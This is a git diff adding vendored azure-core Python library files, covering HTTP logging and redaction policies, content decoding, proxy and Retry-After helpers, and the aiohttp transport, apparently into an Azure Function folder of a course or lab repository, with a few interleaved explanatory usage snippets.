~azure.core.pipeline.PipelineRequest + :param response: The PipelineResponse object. + :type response: ~azure.core.pipeline.PipelineResponse + """ + http_response = response.http_response + try: + logging_enable = response.context["logging_enable"] + if logging_enable: + if not _LOGGER.isEnabledFor(logging.DEBUG): + return + + log_string = "Response status: '{}'".format(http_response.status_code) + log_string += "\nResponse headers:" + for res_header, value in http_response.headers.items(): + log_string += "\n '{}': '{}'".format(res_header, value) + + # We don't want to log binary data if the response is a file. + log_string += "\nResponse content:" + pattern = re.compile(r'attachment; ?filename=["\w.]+', re.IGNORECASE) + header = http_response.headers.get('content-disposition') + + if header and pattern.match(header): + filename = header.partition('=')[2] + log_string += "\nFile attachments: {}".format(filename) + elif http_response.headers.get("content-type", "").endswith("octet-stream"): + log_string += "\nBody contains binary data." + elif http_response.headers.get("content-type", "").startswith("image"): + log_string += "\nBody contains image data." + else: + if response.context.options.get('stream', False): + log_string += "\nBody is streamable." + else: + log_string += "\n{}".format(http_response.text()) + _LOGGER.debug(log_string) + except Exception as err: # pylint: disable=broad-except + _LOGGER.debug("Failed to log response: %s", repr(err)) + + +class HttpLoggingPolicy(SansIOHTTPPolicy): + """The Pipeline policy that handles logging of HTTP requests and responses. 
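
The two logging policies differ in what they emit: ``NetworkTraceLoggingPolicy`` above writes full request/response traces at DEBUG level, while ``HttpLoggingPolicy`` (defined next) logs at INFO level and redacts everything not explicitly allow-listed. A configuration sketch:

```python
import logging
import sys
from azure.core.pipeline.policies import NetworkTraceLoggingPolicy, HttpLoggingPolicy

# A DEBUG-enabled handler must be attached for the network trace to appear.
logger = logging.getLogger('azure')
logger.setLevel(logging.DEBUG)
logger.addHandler(logging.StreamHandler(stream=sys.stdout))
trace_policy = NetworkTraceLoggingPolicy(logging_enable=True)

# Extend the redaction allow-lists for headers/query parameters you trust:
http_logging = HttpLoggingPolicy()
http_logging.allowed_header_names.add('x-ms-my-safe-header')
http_logging.allowed_query_params.add('api-version')
```
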
+ """ + + DEFAULT_HEADERS_WHITELIST = set([ + "x-ms-request-id", + "x-ms-client-request-id", + "x-ms-return-client-request-id", + "traceparent", + "Accept", + "Cache-Control", + "Connection", + "Content-Length", + "Content-Type", + "Date", + "ETag", + "Expires", + "If-Match", + "If-Modified-Since", + "If-None-Match", + "If-Unmodified-Since", + "Last-Modified", + "Pragma", + "Request-Id", + "Retry-After", + "Server", + "Transfer-Encoding", + "User-Agent", + "WWW-Authenticate", # OAuth Challenge header. + ]) + REDACTED_PLACEHOLDER = "REDACTED" + MULTI_RECORD_LOG = "AZURE_SDK_LOGGING_MULTIRECORD" + + def __init__(self, logger=None, **kwargs): # pylint: disable=unused-argument + self.logger = logger or logging.getLogger( + "azure.core.pipeline.policies.http_logging_policy" + ) + self.allowed_query_params = set() + self.allowed_header_names = set(self.__class__.DEFAULT_HEADERS_WHITELIST) + + def _redact_query_param(self, key, value): + lower_case_allowed_query_params = [ + param.lower() for param in self.allowed_query_params + ] + return value if key.lower() in lower_case_allowed_query_params else HttpLoggingPolicy.REDACTED_PLACEHOLDER + + def _redact_header(self, key, value): + lower_case_allowed_header_names = [ + header.lower() for header in self.allowed_header_names + ] + return value if key.lower() in lower_case_allowed_header_names else HttpLoggingPolicy.REDACTED_PLACEHOLDER + + def on_request(self, request): # pylint: disable=too-many-return-statements + # type: (PipelineRequest) -> None + """Logs HTTP method, url and headers. + :param request: The PipelineRequest object. + :type request: ~azure.core.pipeline.PipelineRequest + """ + http_request = request.http_request + options = request.context.options + # Get logger in my context first (request has been retried) + # then read from kwargs (pop if that's the case) + # then use my instance logger + logger = request.context.setdefault("logger", options.pop("logger", self.logger)) + + if not logger.isEnabledFor(logging.INFO): + return + + try: + parsed_url = list(urllib.parse.urlparse(http_request.url)) + parsed_qp = urllib.parse.parse_qsl(parsed_url[4], keep_blank_values=True) + filtered_qp = [(key, self._redact_query_param(key, value)) for key, value in parsed_qp] + # 4 is query + parsed_url[4] = "&".join(["=".join(part) for part in filtered_qp]) + redacted_url = urllib.parse.urlunparse(parsed_url) + + multi_record = os.environ.get(HttpLoggingPolicy.MULTI_RECORD_LOG, False) + if multi_record: + logger.info("Request URL: %r", redacted_url) + logger.info("Request method: %r", http_request.method) + logger.info("Request headers:") + for header, value in http_request.headers.items(): + value = self._redact_header(header, value) + logger.info(" %r: %r", header, value) + if isinstance(http_request.body, types.GeneratorType): + logger.info("File upload") + return + try: + if isinstance(http_request.body, types.AsyncGeneratorType): + logger.info("File upload") + return + except AttributeError: + pass + if http_request.body: + logger.info("A body is sent with the request") + return + logger.info("No body was attached to the request") + return + log_string = "Request URL: '{}'".format(redacted_url) + log_string += "\nRequest method: '{}'".format(http_request.method) + log_string += "\nRequest headers:" + for header, value in http_request.headers.items(): + value = self._redact_header(header, value) + log_string += "\n '{}': '{}'".format(header, value) + if isinstance(http_request.body, types.GeneratorType): + log_string += "\nFile upload" + 
logger.info(log_string)
+                return
+            try:
+                if isinstance(http_request.body, types.AsyncGeneratorType):
+                    log_string += "\nFile upload"
+                    logger.info(log_string)
+                    return
+            except AttributeError:
+                pass
+            if http_request.body:
+                log_string += "\nA body is sent with the request"
+                logger.info(log_string)
+                return
+            log_string += "\nNo body was attached to the request"
+            logger.info(log_string)
+
+        except Exception as err:  # pylint: disable=broad-except
+            logger.warning("Failed to log request: %s", repr(err))
+
+    def on_response(self, request, response):
+        # type: (PipelineRequest, PipelineResponse) -> None
+        http_response = response.http_response
+
+        try:
+            logger = response.context["logger"]
+
+            if not logger.isEnabledFor(logging.INFO):
+                return
+
+            multi_record = os.environ.get(HttpLoggingPolicy.MULTI_RECORD_LOG, False)
+            if multi_record:
+                logger.info("Response status: %r", http_response.status_code)
+                logger.info("Response headers:")
+                for res_header, value in http_response.headers.items():
+                    value = self._redact_header(res_header, value)
+                    logger.info("    %r: %r", res_header, value)
+                return
+            log_string = "Response status: {}".format(http_response.status_code)
+            log_string += "\nResponse headers:"
+            for res_header, value in http_response.headers.items():
+                value = self._redact_header(res_header, value)
+                log_string += "\n    '{}': '{}'".format(res_header, value)
+            logger.info(log_string)
+        except Exception as err:  # pylint: disable=broad-except
+            logger.warning("Failed to log response: %s", repr(err))
+
+class ContentDecodePolicy(SansIOHTTPPolicy):
+    """Policy for decoding unstreamed response content.
+
+    :param response_encoding: The encoding to use if known for this service (will disable auto-detection)
+    :type response_encoding: str
+    """
+    # Accept "text" because we're open-minded people...
+    JSON_REGEXP = re.compile(r'^(application|text)/([0-9a-z+.-]+\+)?json$')
+
+    # Name used in context
+    CONTEXT_NAME = "deserialized_data"
+
+    def __init__(self, response_encoding=None, **kwargs):  # pylint: disable=unused-argument
+        # type: (Optional[str], Any) -> None
+        self._response_encoding = response_encoding
+
+    @classmethod
+    def deserialize_from_text(
+        cls,  # type: Type[ContentDecodePolicyType]
+        data,  # type: Optional[Union[AnyStr, IO]]
+        mime_type=None,  # Optional[str]
+        response=None  # Optional[Union[HttpResponse, AsyncHttpResponse]]
+    ):
+        """Decode response data according to content-type.
+
+        A stream of data is accepted as well, but it will be loaded into memory at once for now.
+        If no content type is given, the string version is returned (not bytes, not a stream).
+
+        :param response: The HTTP response. If passed, the exception will be annotated with that response.
+        :type response: ~azure.core.pipeline.transport.HttpResponse
+        :param str mime_type: The mime type. As mime type, charset is not expected.
+        :raises ~azure.core.exceptions.DecodeError: If deserialization fails
+        :returns: A dict or XML tree, depending on the mime_type
+        """
+        if not data:
+            return None
+
+        if hasattr(data, 'read'):
+            # Assume a stream
+            data = cast(IO, data).read()
+
+        if isinstance(data, bytes):
+            data_as_str = data.decode(encoding='utf-8-sig')
+        else:
+            # Explain to mypy the correct type.
+            data_as_str = cast(str, data)
+
+        if mime_type is None:
+            return data_as_str
+
+        if cls.JSON_REGEXP.match(mime_type):
+            try:
+                return json.loads(data_as_str)
+            except ValueError as err:
+                raise DecodeError(message="JSON is invalid: {}".format(err), response=response, error=err)
+        elif "xml" in (mime_type or []):
+            try:
+                try:
+                    if isinstance(data, unicode):  # type: ignore
+                        # On Python 2.7, "fromstring" will scream if given a unicode string
+                        data_as_str = cast(str, data_as_str.encode(encoding="utf-8"))
+                except NameError:
+                    pass
+                return ET.fromstring(data_as_str)  # nosec
+            except ET.ParseError:
+                # It might be because the server has an issue, and returned JSON with
+                # content-type XML....
+                # So let's try a JSON load, and if it's still broken
+                # let's flow the initial exception
+                def _json_attempt(data):
+                    try:
+                        return True, json.loads(data)
+                    except ValueError:
+                        return False, None  # Don't care about this one
+                success, json_result = _json_attempt(data)
+                if success:
+                    return json_result
+                # If I'm here, it's not JSON, it's not XML, let's scream
+                # and raise the last context in this block (the XML exception)
+                # The function hack is because Py2.7 messes up the exception
+                # context otherwise.
+                _LOGGER.critical("Wasn't XML not JSON, failing")
+                raise_with_traceback(DecodeError, message="XML is invalid", response=response)
+        elif mime_type.startswith("text/"):
+            return data_as_str
+        raise DecodeError("Cannot deserialize content-type: {}".format(mime_type))
+
+    @classmethod
+    def deserialize_from_http_generics(
+        cls,  # type: Type[ContentDecodePolicyType]
+        response,  # Union[HttpResponse, AsyncHttpResponse]
+        encoding=None,  # Optional[str]
+    ):
+        """Deserialize from HTTP response.
+
+        Headers will be tested for "content-type".
+
+        :param response: The HTTP response
+        :param encoding: The encoding to use if known for this service (will disable auto-detection)
+        :raises ~azure.core.exceptions.DecodeError: If deserialization fails
+        :returns: A dict or XML tree, depending on the mime-type
+        """
+        # Try to use content-type from headers if available
+        if response.content_type:
+            mime_type = response.content_type.split(";")[0].strip().lower()
+        # Ouch, this server did not declare what it sent...
+        # Let's guess it's JSON...
+        # Also, since Autorest was considering that an empty body was a valid JSON,
+        # need that test as well....
+        else:
+            mime_type = "application/json"
+
+        # Rely on transport implementation to give me "text()" decoded correctly
+        if hasattr(response, "read"):
+            try:
+                # since users can call deserialize_from_http_generics by themselves
+                # we want to make sure our new responses are read before we try to
+                # deserialize. Only read sync responses since we're in a sync function
+                if not inspect.iscoroutinefunction(response.read):
+                    response.read()
+            except AttributeError:
+                # raises an AttributeError in 2.7 because inspect.iscoroutinefunction was added in 3.5
+                # Entering here means it's 2.7 and that the response has a read method, so we read
+                # because it will be sync.
+ response.read() + return cls.deserialize_from_text(response.text(encoding), mime_type, response=response) + + def on_request(self, request): + # type: (PipelineRequest) -> None + options = request.context.options + response_encoding = options.pop("response_encoding", self._response_encoding) + if response_encoding: + request.context["response_encoding"] = response_encoding + + def on_response(self, + request, # type: PipelineRequest[HTTPRequestType] + response # type: PipelineResponse[HTTPRequestType, Union[HttpResponse, AsyncHttpResponse]] + ): + # type: (...) -> None + """Extract data from the body of a REST response object. + This will load the entire payload in memory. + Will follow Content-Type to parse. + We assume everything is UTF8 (BOM acceptable). + + :param request: The PipelineRequest object. + :type request: ~azure.core.pipeline.PipelineRequest + :param response: The PipelineResponse object. + :type response: ~azure.core.pipeline.PipelineResponse + :param raw_data: Data to be processed. + :param content_type: How to parse if raw_data is a string/bytes. + :raises JSONDecodeError: If JSON is requested and parsing is impossible. + :raises UnicodeDecodeError: If bytes is not UTF8 + :raises xml.etree.ElementTree.ParseError: If bytes is not valid XML + :raises ~azure.core.exceptions.DecodeError: If deserialization fails + """ + # If response was asked as stream, do NOT read anything and quit now + if response.context.options.get("stream", True): + return + + response_encoding = request.context.get('response_encoding') + + response.context[self.CONTEXT_NAME] = self.deserialize_from_http_generics( + response.http_response, + response_encoding + ) + + +class ProxyPolicy(SansIOHTTPPolicy): + """A proxy policy. + + Dictionary mapping protocol or protocol and host to the URL of the proxy + to be used on each Request. + + :param dict proxies: Maps protocol or protocol and hostname to the URL + of the proxy. + + .. admonition:: Example: + + .. literalinclude:: ../samples/test_example_sansio.py + :start-after: [START proxy_policy] + :end-before: [END proxy_policy] + :language: python + :dedent: 4 + :caption: Configuring a proxy policy. + """ + def __init__(self, proxies=None, **kwargs): #pylint: disable=unused-argument,super-init-not-called + self.proxies = proxies + + def on_request(self, request): + # type: (PipelineRequest) -> None + ctxt = request.context.options + if self.proxies and "proxies" not in ctxt: + ctxt["proxies"] = self.proxies diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/policies/_utils.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/policies/_utils.py new file mode 100644 index 0000000..606dd7c --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/policies/_utils.py @@ -0,0 +1,69 @@ +# -------------------------------------------------------------------------- +# +# Copyright (c) Microsoft Corporation. All rights reserved. 
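
Illustrative calls to the ``ContentDecodePolicy`` decode helper defined above (input values chosen for demonstration):

```python
from azure.core.pipeline.policies import ContentDecodePolicy

ContentDecodePolicy.deserialize_from_text('{"a": 1}', 'application/json')  # -> {'a': 1}
ContentDecodePolicy.deserialize_from_text('<r/>', 'application/xml')       # -> ElementTree Element
ContentDecodePolicy.deserialize_from_text('hello', 'text/plain')           # -> 'hello'
# A JSON body mislabelled as XML still decodes, thanks to the fallback above:
ContentDecodePolicy.deserialize_from_text('{"a": 1}', 'application/xml')   # -> {'a': 1}
```
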
+# +# The MIT License (MIT) +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the ""Software""), to +# deal in the Software without restriction, including without limitation the +# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or +# sell copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in +# all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS +# IN THE SOFTWARE. +# +# -------------------------------------------------------------------------- +import datetime +import email.utils +from ...utils._utils import _FixedOffset, case_insensitive_dict + +def _parse_http_date(text): + """Parse a HTTP date format into datetime.""" + parsed_date = email.utils.parsedate_tz(text) + return datetime.datetime( + *parsed_date[:6], + tzinfo=_FixedOffset(parsed_date[9]/60) + ) + +def parse_retry_after(retry_after): + """Helper to parse Retry-After and get value in seconds. + + :param str retry_after: Retry-After header + :rtype: int + """ + try: + delay = int(retry_after) + except ValueError: + # Not an integer? Try HTTP date + retry_date = _parse_http_date(retry_after) + delay = (retry_date - datetime.datetime.now(retry_date.tzinfo)).total_seconds() + return max(0, delay) + +def get_retry_after(response): + """Get the value of Retry-After in seconds. + + :param response: The PipelineResponse object + :type response: ~azure.core.pipeline.PipelineResponse + :return: Value of Retry-After in seconds. + :rtype: float or None + """ + headers = case_insensitive_dict(response.http_response.headers) + retry_after = headers.get("retry-after") + if retry_after: + return parse_retry_after(retry_after) + for ms_header in ["retry-after-ms", "x-ms-retry-after-ms"]: + retry_after = headers.get(ms_header) + if retry_after: + parsed_retry_after = parse_retry_after(retry_after) + return parsed_retry_after / 1000.0 + return None diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/transport/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/transport/__init__.py new file mode 100644 index 0000000..178e574 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/transport/__init__.py @@ -0,0 +1,160 @@ +# -------------------------------------------------------------------------- +# +# Copyright (c) Microsoft Corporation. All rights reserved. 
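
Stepping back to the ``_utils.py`` helpers just added, this sketch shows their behaviour with illustrative inputs (the import path is the vendored module from the diff above):

```python
from azure.core.pipeline.policies._utils import parse_retry_after

parse_retry_after("5")                              # -> 5 (seconds)
parse_retry_after("Wed, 21 Oct 2026 07:28:00 GMT")  # seconds until that HTTP date, floored at 0
# get_retry_after(response) prefers the standard Retry-After header and falls
# back to retry-after-ms / x-ms-retry-after-ms, dividing those values by 1000.0.
```
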
+# +# The MIT License (MIT) +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the ""Software""), to +# deal in the Software without restriction, including without limitation the +# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or +# sell copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in +# all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS +# IN THE SOFTWARE. +# +# -------------------------------------------------------------------------- + +import sys +from ._base import HttpTransport, HttpRequest, HttpResponse + +__all__ = [ + 'HttpTransport', + 'HttpRequest', + 'HttpResponse', +] + +# pylint: disable=unused-import, redefined-outer-name +try: + from ._requests_basic import RequestsTransport, RequestsTransportResponse + __all__.extend([ + 'RequestsTransport', + 'RequestsTransportResponse', + ]) + try: + from ._base_async import AsyncHttpTransport, AsyncHttpResponse + from ._requests_asyncio import AsyncioRequestsTransport, AsyncioRequestsTransportResponse + + __all__.extend([ + 'AsyncHttpTransport', + 'AsyncHttpResponse', + 'AsyncioRequestsTransport', + 'AsyncioRequestsTransportResponse' + ]) + + if sys.version_info >= (3, 7): + __all__.extend([ + 'TrioRequestsTransport', + 'TrioRequestsTransportResponse', + 'AioHttpTransport', + 'AioHttpTransportResponse', + ]) + + def __dir__(): + return __all__ + + def __getattr__(name): + if name == 'AioHttpTransport': + try: + from ._aiohttp import AioHttpTransport + return AioHttpTransport + except ImportError: + raise ImportError("aiohttp package is not installed") + if name == 'AioHttpTransportResponse': + try: + from ._aiohttp import AioHttpTransportResponse + return AioHttpTransportResponse + except ImportError: + raise ImportError("aiohttp package is not installed") + if name == 'TrioRequestsTransport': + try: + from ._requests_trio import TrioRequestsTransport + return TrioRequestsTransport + except ImportError: + raise ImportError("trio package is not installed") + if name == 'TrioRequestsTransportResponse': + try: + from ._requests_trio import TrioRequestsTransportResponse + return TrioRequestsTransportResponse + except ImportError: + raise ImportError("trio package is not installed") + if name == '__bases__': + raise AttributeError("module 'azure.core.pipeline.transport' has no attribute '__bases__'") + return name + + else: + try: + from ._requests_trio import TrioRequestsTransport, TrioRequestsTransportResponse + + __all__.extend([ + 'TrioRequestsTransport', + 'TrioRequestsTransportResponse' + ]) + except ImportError: + pass # Trio not installed + + try: + from ._aiohttp import AioHttpTransport, AioHttpTransportResponse + + __all__.extend([ + 'AioHttpTransport', + 'AioHttpTransportResponse', + ]) + except ImportError: + pass # Aiohttp not installed + except (ImportError, SyntaxError): + # requests library is 
installed but asynchronous pipelines not supported. + pass +except (ImportError, SyntaxError): + # requests library is not installed + try: + from ._base_async import AsyncHttpTransport, AsyncHttpResponse + __all__.extend([ + 'AsyncHttpTransport', + 'AsyncHttpResponse', + ]) + + if sys.version_info >= (3, 7): + __all__.extend([ + 'AioHttpTransport', + 'AioHttpTransportResponse', + ]) + + def __dir__(): + return __all__ + + def __getattr__(name): + if name == 'AioHttpTransport': + try: + from ._aiohttp import AioHttpTransport + return AioHttpTransport + except ImportError: + raise ImportError("aiohttp package is not installed") + if name == 'AioHttpTransportResponse': + try: + from ._aiohttp import AioHttpTransportResponse + return AioHttpTransportResponse + except ImportError: + raise ImportError("aiohttp package is not installed") + return name + + else: + try: + from ._aiohttp import AioHttpTransport, AioHttpTransportResponse + __all__.extend([ + 'AioHttpTransport', + 'AioHttpTransportResponse', + ]) + except ImportError: + pass # Aiohttp not installed + except (ImportError, SyntaxError): + pass # Asynchronous pipelines not supported. diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/transport/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/transport/__pycache__/__init__.cpython-39.pyc new file mode 100644 index 0000000..3774e3d Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/transport/__pycache__/__init__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/transport/__pycache__/_aiohttp.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/transport/__pycache__/_aiohttp.cpython-39.pyc new file mode 100644 index 0000000..cf62831 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/transport/__pycache__/_aiohttp.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/transport/__pycache__/_base.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/transport/__pycache__/_base.cpython-39.pyc new file mode 100644 index 0000000..3e5e147 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/transport/__pycache__/_base.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/transport/__pycache__/_base_async.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/transport/__pycache__/_base_async.cpython-39.pyc new file mode 100644 index 0000000..736e5fb Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/transport/__pycache__/_base_async.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/transport/__pycache__/_base_requests_async.cpython-39.pyc 
b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/transport/__pycache__/_base_requests_async.cpython-39.pyc new file mode 100644 index 0000000..2890b7e Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/transport/__pycache__/_base_requests_async.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/transport/__pycache__/_bigger_block_size_http_adapters.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/transport/__pycache__/_bigger_block_size_http_adapters.cpython-39.pyc new file mode 100644 index 0000000..738e928 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/transport/__pycache__/_bigger_block_size_http_adapters.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/transport/__pycache__/_requests_asyncio.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/transport/__pycache__/_requests_asyncio.cpython-39.pyc new file mode 100644 index 0000000..5a5724f Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/transport/__pycache__/_requests_asyncio.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/transport/__pycache__/_requests_basic.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/transport/__pycache__/_requests_basic.cpython-39.pyc new file mode 100644 index 0000000..6dfd895 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/transport/__pycache__/_requests_basic.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/transport/__pycache__/_requests_trio.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/transport/__pycache__/_requests_trio.cpython-39.pyc new file mode 100644 index 0000000..8940671 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/transport/__pycache__/_requests_trio.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/transport/_aiohttp.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/transport/_aiohttp.py new file mode 100644 index 0000000..0a41eec --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/transport/_aiohttp.py @@ -0,0 +1,420 @@ +# -------------------------------------------------------------------------- +# +# Copyright (c) Microsoft Corporation. All rights reserved. 
+# +# The MIT License (MIT) +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the ""Software""), to +# deal in the Software without restriction, including without limitation the +# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or +# sell copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in +# all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS +# IN THE SOFTWARE. +# +# -------------------------------------------------------------------------- +import sys +from typing import ( + Any, Optional, AsyncIterator as AsyncIteratorType, TYPE_CHECKING, overload +) +from collections.abc import AsyncIterator + +import logging +import asyncio +import codecs +import aiohttp +from multidict import CIMultiDict + +from azure.core.configuration import ConnectionConfiguration +from azure.core.exceptions import ServiceRequestError, ServiceResponseError, IncompleteReadError +from azure.core.pipeline import Pipeline + +from ._base import HttpRequest +from ._base_async import ( + AsyncHttpTransport, + AsyncHttpResponse, + _ResponseStopIteration) +from ...utils._pipeline_transport_rest_shared import _aiohttp_body_helper +from .._tools import is_rest as _is_rest +from .._tools_async import handle_no_stream_rest_response as _handle_no_stream_rest_response +if TYPE_CHECKING: + from ...rest import ( + HttpRequest as RestHttpRequest, + AsyncHttpResponse as RestAsyncHttpResponse, + ) + +# Matching requests, because why not? +CONTENT_CHUNK_SIZE = 10 * 1024 +_LOGGER = logging.getLogger(__name__) + +class AioHttpTransport(AsyncHttpTransport): + """AioHttp HTTP sender implementation. + + Fully asynchronous implementation using the aiohttp library. + + :param session: The client session. + :param bool session_owner: Session owner. Defaults True. + + :keyword bool use_env_settings: Uses proxy settings from environment. Defaults to True. + + .. admonition:: Example: + + .. literalinclude:: ../samples/test_example_async.py + :start-after: [START aiohttp] + :end-before: [END aiohttp] + :language: python + :dedent: 4 + :caption: Asynchronous transport with aiohttp. + """ + def __init__(self, *, session: Optional[aiohttp.ClientSession] = None, loop=None, session_owner=True, **kwargs): + if loop and sys.version_info >= (3, 10): + raise ValueError("Starting with Python 3.10, asyncio doesn’t support loop as a parameter anymore") + self._loop = loop + self._session_owner = session_owner + self.session = session + self.connection_config = ConnectionConfiguration(**kwargs) + self._use_env_settings = kwargs.pop('use_env_settings', True) + + async def __aenter__(self): + await self.open() + return self + + async def __aexit__(self, *args): # pylint: disable=arguments-differ + await self.close() + + async def open(self): + """Opens the connection. 
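
A usage sketch for the transport; the second variant hands in an externally owned session, so ``close()`` will not tear it down:

```python
import aiohttp
from azure.core.pipeline.transport import AioHttpTransport

async def example():
    # Transport-owned session: opened lazily, closed on exit.
    async with AioHttpTransport() as transport:
        ...

    # Externally managed session:
    session = aiohttp.ClientSession()
    transport = AioHttpTransport(session=session, session_owner=False)
    await transport.open()
```
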
+ """ + if not self.session and self._session_owner: + jar = aiohttp.DummyCookieJar() + clientsession_kwargs = { + "trust_env": self._use_env_settings, + "cookie_jar": jar, + "auto_decompress": False, + } + if self._loop is not None: + clientsession_kwargs["loop"] = self._loop + self.session = aiohttp.ClientSession(**clientsession_kwargs) + if self.session is not None: + await self.session.__aenter__() + + async def close(self): + """Closes the connection. + """ + if self._session_owner and self.session: + await self.session.close() + self._session_owner = False + self.session = None + + def _build_ssl_config(self, cert, verify): # pylint: disable=no-self-use + ssl_ctx = None + + if cert or verify not in (True, False): + import ssl + if verify not in (True, False): + ssl_ctx = ssl.create_default_context(cafile=verify) + else: + ssl_ctx = ssl.create_default_context() + if cert: + ssl_ctx.load_cert_chain(*cert) + return ssl_ctx + return verify + + def _get_request_data(self, request): #pylint: disable=no-self-use + if request.files: + form_data = aiohttp.FormData() + for form_file, data in request.files.items(): + content_type = data[2] if len(data) > 2 else None + try: + form_data.add_field(form_file, data[1], filename=data[0], content_type=content_type) + except IndexError: + raise ValueError("Invalid formdata formatting: {}".format(data)) + return form_data + return request.data + + @overload + async def send(self, request: HttpRequest, **config: Any) -> Optional[AsyncHttpResponse]: + """Send the request using this HTTP sender. + + Will pre-load the body into memory to be available with a sync method. + Pass stream=True to avoid this behavior. + + :param request: The HttpRequest object + :type request: ~azure.core.pipeline.transport.HttpRequest + :param config: Any keyword arguments + :return: The AsyncHttpResponse + 